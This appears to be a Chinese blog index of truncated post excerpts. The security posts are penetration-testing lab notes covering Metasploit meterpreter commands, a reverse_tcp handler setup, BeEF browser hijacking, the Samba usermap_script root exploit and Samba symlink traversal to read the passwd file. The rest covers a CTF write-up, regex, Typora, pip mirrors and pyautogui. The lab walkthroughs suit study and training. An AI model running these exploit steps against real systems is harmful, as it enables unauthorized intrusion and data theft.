metasploit之meterpreter命令
metasploit之meterpreter命令目的: 了解meterpreter命令原理:ps 查询当前目标机所有进程getpid 获取当前会话进程getuid 当前用户所用的权限,所在用户组sysinfo 取系统信息getsystem 提升至system最高权限shell 进入cmdshell命令模式pwd 查看当前所在位置cat 查看文本文件ipconfig 查看网络配置信息migrate pid 迁移pidscreenshot 截取当前用户屏幕保存到本地
过程:打开终端,运行msf,use exploit/multi/handler选择exploit,set payload windows/meterpreter/reverse_tcp设置payload,set LHOST 192.168.1.2设置监听主机,set LPORT 11101设置端口
输入exploit -j运行脚本,且在后台监听
靶机双击桌面运行xx.exe,返回kali,已经取得会话
敲击回车, ...
beef+metasploit利用浏览器获取shell
beef+metasploit利用浏览器获取shell利用beef获得目标主机shell原理:beef是一个用于合法研究和测试目的的专业浏览器漏洞利用框架。它允许有经验的渗透测试人员或系统管理员对目标进行攻击测试。攻击成功以后会加载浏览器劫持会话。BEEF可以利用XSS跨站脚本漏洞。过程:打开终端,将beef和metasploit进行关联,终端进入beef-xss目录,编辑文件config.yaml
将文件中metasploit的enable的false修改为true,保存退出
进入 /usr/share/beef-xss/extensions/metasploit/目录,编辑config.yaml文件,把host的参数跟callback_host参数修改成kali主机ip
将custom path的路径修改为 /usr/share/metasploit-framework/,保存退出
输入命令/etc/init.d/postgresql start,启动postgresql服务,输入命令msfdb init,初始化数据库
终端中输入msfconsole,启动metaspl ...
samba提权
samba提权利用samba漏洞,获得目标主机root权限原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。过程:确定目标存在445和139端口开放,使用msf,输入命令search samba
使用命令use exploit/multi/samba/usermap_script,启用漏洞利用模块,终端输入info,查看相关信息
输入set RHOST ip,设置目标ip地址,输入exploit,开始攻击,攻击成功后,建立会话
输入whoami查看权限,输入ifconfig,查看系统网络信息
实验完成
sysmlink漏洞
sysmlink 目录遍历漏洞利用sysmlink漏洞读取目标主机的passwd文件内容原理:Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件。过程:使用nmap -sV ip 扫描主机,确认开放445,139端口且安装了samba服务,版本为3
命令行输入search samba,搜索samba的相关工具和载荷。
终端中输入use auxiliary/admin/smb/samba_symlink_traversal,启用漏洞利用模块
输入info,"yes"表示必须要填写的信息
输入set RHOST 192.168.1.3和set SMBSHARE tmp,设置主机ip地址和SAM可写文件
输入exploit开始攻击
新建终端,输入smbclient //192.168.1.3/tmp,直接回车, ...
redrock-wp-2021
redrockcrf wpMSIC一眼看不出flag:题目:-…/.-/.-/-…/.-/.-/-…/-…/-…/.-/.-/.-/-…/.-/.-/.-/.-/.-/.-/.-/-…/.-/.-/-…/.-/-…/-…/.-/.-/.-
摩斯密码,在线解密,得到BAABAABBBAAABAAAAAAABAABABBAAA,是培根密码,解密结果是soeasy,提交redrock{soeasy};
ELMA:题目:
根据hint,进入对应网站http://www.atoolbox.net/Tool.php?Id=699
上传图片解密,得到链接https://rin777-1306176007.cos.ap-nanjing.myqcloud.com/lsb.jpg
进去是一个残缺的二维码
修补角上的方块,微信扫码可得到flag,redrock{Welc_0meToR3dRo_ckCup}
yyz的流量:打开往下浏览发现隐隐约约有一些text的包,直接使用wireshark的导出功能,把HTTP的全部导出保存,发现导出的文件中名为_的里面是一个上传界面的html代码,继续往下 ...
常用工具
常用工具图片隐写:zsteg,stegslove,outguess,pngcheck。
正则表达式
正则表达式.表示任意单个字符(除了换行符)
[]表示里面的任何一个字符
a{1,5}表示a有1到5之间个字符
{0,}表示0个或者无穷个
*表示{0,}
+表示{1,}
?表示{0,1}
[^a,b,c]表示除了a,b,c的其他字符
^是字符串开头
$是字符串结尾
(?<=(a))表示以a开头
(?=(a))表示以a结尾
\d , \w , \ s 匹配数字,字符,空格
\D , \W ,\S 匹配非数字,非字符,非空格
Typora简单语法
Typora简单语法 typora是一款极致简洁的markdown文本编辑器,支持即时渲染技术,是编写markdown的好手,非常的好用。
下载Typora官网下载链接: https://www.typora.io/#download
官网速度是有点慢的,所以这里附上windows64位的链接
百度网盘: 链接:https://pan.baidu.com/s/1BCdw0eBPushTxzfz71S0gA提取码:2n9x
一、标题标题的语法是**#+空格+文字**,一个#是一级标题,两个#是二级标题,以此类推。
一级标题二级标题三级标题四级标题五级标题六级标题快捷键: ctrl+1~6
清除: 标题放在要清除的行,按下ctrl+0。
文字加粗、斜体、加粗斜体用一对 * 把文字包含就是斜体,(不要加空格)。斜体
用两对 * 把文字包含就是粗体,(不要加空格)。粗体加粗符号有规则,前面的**不能跟符号,如果跟符号,则前面有空格,后面的**前面不能有符号,如果有符号,则后面有空格如**(abc)**,应写成空格**(abc)**空格,(abc),
用三对 * 把文字包含就是 ...
python永久换第三方库国内源
python永久换第三方库国内源12#北京外国语大学镜像站pip config set global.index-url https://mirrors.bfsu.edu.cn/pypi/web/simple
国内靠谱的 pip 镜像源有:
(1)清华: pip config set global.index-url https://pypi.tuna.tsinghua.edu.cn/simple
(2)豆瓣: pip config set global.index-url http://pypi.douban.com/simple/
(3)阿里: pip config set global.index-url http://mirrors.aliyun.com/pypi/simple/
(4)腾讯: pip config set global.index-url https://mirrors.cloud.tencent.com/pypi/simple/
pyautogui的简单基础
pyautogui的简单基础安装pyautogui1pip install pyautogui
查看屏幕大小12import pyautogui as pagprint(pag.size()) #左上角坐标为(0,0)
输出鼠标位置12import pyautogui as pagprint(pag.position())
鼠标点击123import pyautogui as pagpag.click(0,200,clicks=3,interval=1,button='left')#前面两个是坐标,clicks是点击次数,默认为1,interval是间隔时间,默认为0,button值为left是鼠标左键,right是右键
使用键盘的按键12import pyautogui as pagpag.press('enter')
鼠标移动123import pyautogui as pagpag.moveTo(600,800,duration=1) #前面两个参数是坐标,duration是花多少时间移动到目标位置
简单 ...